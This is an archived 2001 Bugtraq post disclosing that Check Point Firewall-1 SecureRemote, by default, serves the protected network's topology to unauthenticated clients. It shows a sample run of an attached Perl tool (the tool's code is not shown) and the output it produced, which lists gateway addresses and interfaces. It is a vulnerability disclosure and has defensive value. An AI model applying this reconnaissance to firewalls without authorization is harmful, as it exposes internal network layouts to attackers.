Bugtraq mailing list archives

Firewall-1 Information leak

From: Haroon Meer <haroon () sensepost com>
Date: Wed, 18 Jul 2001 03:29:28 +0200 (SAST)



Hi.

Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
to create encrypted sessions between users and FW-1 modules. Before remote
users are able to communicate with internal hosts, a network topology of
the protected network is downloaded to the client. While newer versions of
the FW-1 software have the ability to restrict these downloads to only
authenticated sessions, the default setting allows unauthenticated
requests to be honoured. This gives a potential attacker a wealth of
information including ip addresses, network masks (and even friendly
descriptions)

The attached file will connect to the firewall, and download the
toplogy (if SecureRemote is running)
(it is a tiny perl file, which needs only Socket, so avoids the hassle of
having to install the SecureRemote client <or booting windows> to test a
firewall-1) 

--snip--
SensePost# perl sr.pl firewall.victim.com
Testing  on port 256
        :val (
                :reply (
                        : (-SensePost-dotcom-.hal9000-19.3.167.186
                                :type (gateway)
                                :is_fwz (true)
                                :is_isakmp (true)
                                :certificates ()
                                :uencapport (2746)
                                :fwver (4.1)
                                :ipaddr (19.3.167.186)
                                :ipmask (255.255.255.255)
                                :resolve_multiple_interfaces ()
                                :ifaddrs (
                                        : (16.3.167.186)
                                        : (12.20.240.1)
                                        : (16.3.170.1)
                                        : (29.203.37.97)
                                )
                                :firewall (installed)
                                :location (external)
                                :keyloc (remote)
                                :userc_crypt_ver (1)
                                :keymanager (
                                        :type (refobj)
                                        :refname ("#_-SensePost-dotcom-")

)                               :name
                                (-SensePost-dotcom-Neo16.3.167.189)
                                                :type (gateway)
                                                :ipaddr (172.29.0.1)
                                                :ipmask (255.255.255.255)
                                        )
        
--snip-- 

Haroon Meer
+27 837866637
haroon () sensepost com
http://www.sensepost.com

Attachment: sr.pl
Description:

Current thread:

Firewall-1 Information leak Haroon Meer (Jul 17)
- RE: Firewall-1 Information leak Lars Troen (Jul 18)
- Re: Firewall-1 Information leak Bugtraq Account (Jul 19)
- <Possible follow-ups>
- Re: Firewall-1 Information leak Christian Herb (Jul 18)
- RE: Firewall-1 Information leak David Sexton (Jul 20)
- RE: Firewall-1 Information leak MALIN, ALEX (PB) (Jul 23)
  - RE: Firewall-1 Information leak Hugo van der Kooij (Jul 23)
    - RE: Firewall-1 Information leak Mariusz Woloszyn (Jul 24)
    - RE: Firewall-1 Information leak Stephen JT Bourike (Jul 24)
    - Re: Firewall-1 Information leak Grzegorz Mucha (Jul 25)